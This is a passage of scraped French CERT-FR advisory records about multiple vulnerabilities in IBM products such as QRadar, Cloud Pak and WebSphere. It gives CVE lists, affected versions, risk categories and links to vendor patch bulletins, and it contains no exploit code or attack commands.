{
"name": "CVE-2024-36114",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36114"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2019-12086",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12086"
},
{
"name": "CVE-2024-6827",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6827"
},
{
"name": "CVE-2023-52933",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52933"
},
{
"name": "CVE-2021-21290",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21290"
},
{
"name": "CVE-2024-12243",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12243"
},
{
"name": "CVE-2022-2625",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2625"
},
{
"name": "CVE-2023-2976",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2976"
},
{
"name": "CVE-2017-17485",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-17485"
},
{
"name": "CVE-2024-6762",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6762"
},
{
"name": "CVE-2022-1471",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1471"
},
{
"name": "CVE-2024-52894",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52894"
},
{
"name": "CVE-2025-21759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21759"
},
{
"name": "CVE-2022-3171",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3171"
},
{
"name": "CVE-2025-21887",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21887"
},
{
"name": "CVE-2025-6442",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6442"
},
{
"name": "CVE-2024-12133",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12133"
},
{
"name": "CVE-2024-51504",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51504"
},
{
"name": "CVE-2022-41881",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41881"
},
{
"name": "CVE-2025-47273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47273"
},
{
"name": "CVE-2025-21756",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21756"
},
{
"name": "CVE-2018-1000873",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000873"
},
{
"name": "CVE-2023-32305",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32305"
},
{
"name": "CVE-2025-47287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47287"
},
{
"name": "CVE-2024-57699",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57699"
},
{
"name": "CVE-2025-3576",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3576"
},
{
"name": "CVE-2025-48734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48734"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0760",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-09-05T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Injection SQL (SQLi)"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243927",
"url": "https://www.ibm.com/support/pages/node/7243927"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243923",
"url": "https://www.ibm.com/support/pages/node/7243923"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243924",
"url": "https://www.ibm.com/support/pages/node/7243924"
},
{
"published_at": "2025-09-04",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7244012",
"url": "https://www.ibm.com/support/pages/node/7244012"
},
{
"published_at": "2025-09-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243659",
"url": "https://www.ibm.com/support/pages/node/7243659"
},
{
"published_at": "2025-09-04",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7244002",
"url": "https://www.ibm.com/support/pages/node/7244002"
},
{
"published_at": "2025-08-29",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243582",
"url": "https://www.ibm.com/support/pages/node/7243582"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243928",
"url": "https://www.ibm.com/support/pages/node/7243928"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243925",
"url": "https://www.ibm.com/support/pages/node/7243925"
},
{
"published_at": "2025-09-04",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7244010",
"url": "https://www.ibm.com/support/pages/node/7244010"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243922",
"url": "https://www.ibm.com/support/pages/node/7243922"
},
{
"published_at": "2025-09-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243673",
"url": "https://www.ibm.com/support/pages/node/7243673"
},
{
"published_at": "2025-09-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243877",
"url": "https://www.ibm.com/support/pages/node/7243877"
}
]
}
CERTFR-2025-AVI-0481
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
References
| Title | Publication Time | Tags | ||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "IBM Cloud Pak for Security versions 1.10.x ant\u00e9rieures \u00e0 1.11.3.0",
"product": {
"name": "Cloud Pak",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Suite Software versions post\u00e9rieures \u00e0 1.10.12.0 et ant\u00e9rieures \u00e0 1.11.3.0 ",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-32996",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32996"
},
{
"name": "CVE-2019-11038",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-11038"
},
{
"name": "CVE-2021-38593",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-38593"
},
{
"name": "CVE-2025-1334",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1334"
},
{
"name": "CVE-2020-15250",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15250"
},
{
"name": "CVE-2023-37920",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37920"
},
{
"name": "CVE-2024-0793",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0793"
},
{
"name": "CVE-2017-9047",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-9047"
},
{
"name": "CVE-2024-49766",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49766"
},
{
"name": "CVE-2024-56326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56326"
},
{
"name": "CVE-2024-56171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56171"
},
{
"name": "CVE-2024-38819",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38819"
},
{
"name": "CVE-2025-27144",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27144"
},
{
"name": "CVE-2022-49043",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49043"
},
{
"name": "CVE-2024-11831",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11831"
},
{
"name": "CVE-2025-30691",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30691"
},
{
"name": "CVE-2024-38809",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38809"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-47764",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47764"
},
{
"name": "CVE-2023-52355",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52355"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2024-56337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56337"
},
{
"name": "CVE-2025-32997",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32997"
},
{
"name": "CVE-2024-9902",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9902"
},
{
"name": "CVE-2025-21587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21587"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2024-56332",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56332"
},
{
"name": "CVE-2024-56201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56201"
},
{
"name": "CVE-2024-38827",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38827"
},
{
"name": "CVE-2023-43804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43804"
},
{
"name": "CVE-2025-25019",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25019"
},
{
"name": "CVE-2020-35538",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35538"
},
{
"name": "CVE-2025-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30698"
},
{
"name": "CVE-2025-26791",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26791"
},
{
"name": "CVE-2024-49767",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49767"
},
{
"name": "CVE-2024-38828",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38828"
},
{
"name": "CVE-2018-5711",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-5711"
},
{
"name": "CVE-2023-1916",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1916"
},
{
"name": "CVE-2025-25022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25022"
},
{
"name": "CVE-2025-25020",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25020"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"name": "CVE-2022-1354",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1354"
},
{
"name": "CVE-2025-25021",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25021"
},
{
"name": "CVE-2024-52304",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52304"
},
{
"name": "CVE-2023-24607",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24607"
},
{
"name": "CVE-2025-22235",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22235"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2024-57556",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57556"
},
{
"name": "CVE-2025-27363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27363"
},
{
"name": "CVE-2025-24928",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24928"
},
{
"name": "CVE-2024-50379",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50379"
},
{
"name": "CVE-2023-24056",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24056"
},
{
"name": "CVE-2024-38816",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38816"
},
{
"name": "CVE-2024-52317",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52317"
},
{
"name": "CVE-2024-52316",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52316"
},
{
"name": "CVE-2022-3570",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3570"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0481",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-06-06T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-06-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7235432",
"url": "https://www.ibm.com/support/pages/node/7235432"
},
{
"published_at": "2025-06-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7235402",
"url": "https://www.ibm.com/support/pages/node/7235402"
}
]
}
CERTFR-2025-AVI-0337
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Sterling | Sterling Connect:Direct Web Services versions 6.1.x antérieures à 6.1.0.28 | ||
| IBM | QRadar | QRadar Suite Software versions 1.1x.x.x antérieures à 1.11.2.x | ||
| IBM | Cloud Pak | Cloud Pak for Security versions 1.1x.x.x antérieures à 1.11.2.x | ||
| IBM | QRadar | SOAR QRadar Plugin App versions antérieures à 5.6.0 |
References
| Title | Publication Time | Tags | |||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Sterling Connect:Direct Web Services versions 6.1.x ant\u00e9rieures \u00e0 6.1.0.28",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Suite Software versions 1.1x.x.x ant\u00e9rieures \u00e0 1.11.2.x",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cloud Pak for Security versions 1.1x.x.x ant\u00e9rieures \u00e0 1.11.2.x",
"product": {
"name": "Cloud Pak",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "SOAR QRadar Plugin App versions ant\u00e9rieures \u00e0 5.6.0",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-42459",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42459"
},
{
"name": "CVE-2024-21235",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21235"
},
{
"name": "CVE-2024-6531",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6531"
},
{
"name": "CVE-2024-22201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22201"
},
{
"name": "CVE-2023-1370",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1370"
},
{
"name": "CVE-2024-55565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55565"
},
{
"name": "CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"name": "CVE-2024-4068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4068"
},
{
"name": "CVE-2020-35494",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35494"
},
{
"name": "CVE-2020-15250",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15250"
},
{
"name": "CVE-2024-23944",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23944"
},
{
"name": "CVE-2024-12797",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
},
{
"name": "CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"name": "CVE-2024-21068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21068"
},
{
"name": "CVE-2020-35496",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35496"
},
{
"name": "CVE-2024-21534",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21534"
},
{
"name": "CVE-2024-42460",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42460"
},
{
"name": "CVE-2024-56326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56326"
},
{
"name": "CVE-2024-45813",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45813"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2023-45133",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45133"
},
{
"name": "CVE-2025-21613",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21613"
},
{
"name": "CVE-2024-12798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12798"
},
{
"name": "CVE-2023-25584",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25584"
},
{
"name": "CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"name": "CVE-2025-22866",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22866"
},
{
"name": "CVE-2024-4067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4067"
},
{
"name": "CVE-2024-29018",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29018"
},
{
"name": "CVE-2024-8184",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8184"
},
{
"name": "CVE-2025-1302",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1302"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-21538",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21538"
},
{
"name": "CVE-2024-45336",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45336"
},
{
"name": "CVE-2024-48948",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48948"
},
{
"name": "CVE-2024-0450",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0450"
},
{
"name": "CVE-2024-12801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12801"
},
{
"name": "CVE-2018-18700",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-18700"
},
{
"name": "CVE-2024-47554",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47554"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2024-6763",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6763"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2019-16163",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16163"
},
{
"name": "CVE-2024-56201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56201"
},
{
"name": "CVE-2023-51775",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51775"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2023-52428",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52428"
},
{
"name": "CVE-2024-10041",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10041"
},
{
"name": "CVE-2023-1972",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1972"
},
{
"name": "CVE-2025-26791",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26791"
},
{
"name": "CVE-2024-10963",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10963"
},
{
"name": "CVE-2024-6119",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6119"
},
{
"name": "CVE-2023-25588",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25588"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2020-35495",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35495"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2024-42461",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42461"
},
{
"name": "CVE-2024-29180",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29180"
},
{
"name": "CVE-2019-12972",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12972"
},
{
"name": "CVE-2025-1094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1094"
},
{
"name": "CVE-2023-25585",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25585"
},
{
"name": "CVE-2025-21614",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21614"
},
{
"name": "CVE-2025-21502",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21502"
},
{
"name": "CVE-2020-35507",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35507"
},
{
"name": "CVE-2020-35493",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35493"
},
{
"name": "CVE-2024-21217",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21217"
},
{
"name": "CVE-2018-12699",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12699"
},
{
"name": "CVE-2024-57699",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57699"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0337",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-04-18T00:00:00.000000"
}
],
"risks": [
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Injection SQL (SQLi)"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-04-11",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7230739",
"url": "https://www.ibm.com/support/pages/node/7230739"
},
{
"published_at": "2025-04-17",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7231169",
"url": "https://www.ibm.com/support/pages/node/7231169"
},
{
"published_at": "2025-04-16",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7231051",
"url": "https://www.ibm.com/support/pages/node/7231051"
}
]
}
CERTFR-2025-AVI-0452
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Security QRadar EDR | Security QRadar EDR versions 3.12.x antérieures à 3.12.17 | ||
| IBM | WebSphere | WebSphere Application Server versions 9.x sans les derniers correctifs de sécurité | ||
| IBM | WebSphere Service Registry and Repository | WebSphere Service Registry and Repository versions 8.5.x sans les derniers correctifs de sécurité | ||
| IBM | WebSphere | WebSphere Application Server versions 8.5.x sans le correctif PH66499 ou antérieures à 8.5.5.28 (correctif prévu au troisième trimestre 2025) |
References
| Title | Publication Time | Tags | ||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Security QRadar EDR versions 3.12.x ant\u00e9rieures \u00e0 3.12.17",
"product": {
"name": "Security QRadar EDR",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server versions 9.x sans les derniers correctifs de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Service Registry and Repository versions 8.5.x sans les derniers correctifs de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere Service Registry and Repository",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server versions 8.5.x sans le correctif PH66499 ou ant\u00e9rieures \u00e0 8.5.5.28 (correctif pr\u00e9vu au troisi\u00e8me trimestre 2025)",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-4447",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4447"
},
{
"name": "CVE-2024-12797",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
},
{
"name": "CVE-2024-45641",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45641"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2025-21587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21587"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2025-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30698"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2023-33861",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-33861"
},
{
"name": "CVE-2025-27363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27363"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0452",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-05-23T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-05-21",
